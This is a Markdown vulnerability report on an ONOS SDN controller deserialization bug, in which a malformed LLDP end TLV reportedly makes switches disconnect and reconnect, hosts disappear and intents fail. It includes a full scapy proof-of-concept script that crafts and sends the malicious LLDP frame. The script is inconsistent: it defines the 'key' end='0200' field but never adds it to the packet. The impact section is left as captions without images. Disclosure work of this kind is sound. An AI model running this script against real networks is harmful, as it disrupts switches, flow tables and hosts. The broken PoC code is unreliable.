ONOS deserialization bug

ONOS_Deserialization_Bug.md

Overview

A vulnerability has been discovered in the ONOS (Open Network Operating System) where modifying the LLDP packet's "end TLV" field to 0200 (or another tlv type) triggers a packet deserialization problem. This issue leads to unexpected network behavior such as switch reconnections, flow table reinstallation, and re-discovery of topology and host information.

Vulnerability Description
When processing LLDP packets, ONOS expects the end TLV field to follow a specific format. Changing this field to 0200 (or another tlv type) disrupts the deserialization process, causing the following effects:

• Switch Disconnection/Reconnection: The affected switch disconnects from the controller and then reconnects. Links also are re-discovered.

• Flow Table Reinstallation: The *core application(There may be more, depending on how many applications downstream the flow table immediately after a switch is connected to the controller.) reissues flow tables.

• Host Information Loss: All hosts under the switch connected to the malicious host disappear and need to be rediscovered.

• Intent to fail: The intent associated with the disappearing host becomes a failure state.

• Change in Switch Communication IDs: The communication IDs of the switch and controller will change.

Steps to Reproduce

1. Select a host under the switch as the malicious host and execute poc.py.
   The contents of poc.py:

   from scapy.all import *
   import binascii
   
   
   dstmac = "0180c200000e"
   src = "02eb607e2c6e"
   type="88cc"
   chassis = "020704000000000005"
   port= "04020232"
   ttl = "06020078"
   pn="fe12a42305014f4e4f5320446973636f76657279"
   dv="fe17a42305026f663a30303030303030303030303030303034"
   ts="fe0ca4230504" + "00000190ca847469"
   sig="fe24a42305057b8fb5f89af89bc3ecd3e454d2dbc466613ba15250c3735979a50cefad82a7fb"
   ps="080773332d65746832"
   end="0200"	# the Key Fields
   
   lldp = dstmac + src + type + chassis + port + ttl + pn + dv + ts + sig + ps
   raw_data = binascii.unhexlify(lldp)
   sendp(raw_data)

2. Observe ONOS Behavior and Verify Network Impact: Check the ONOS controller logs for errors related to packet deserialization. Notice the switch disconnecting/reconnecting, flow tables being reissued, and topology/host information being refreshed.

Operationalization and impact

The environment for the experiment is a SDN network with a combination of onos and mininet.

Inside some of the images is another script that sends packets, which actually works like poc.py.

• Topology transformation and logging output:

  

• Host disappears:

  

• Link disappearance, rediscovery:
  

• Intent execution failure: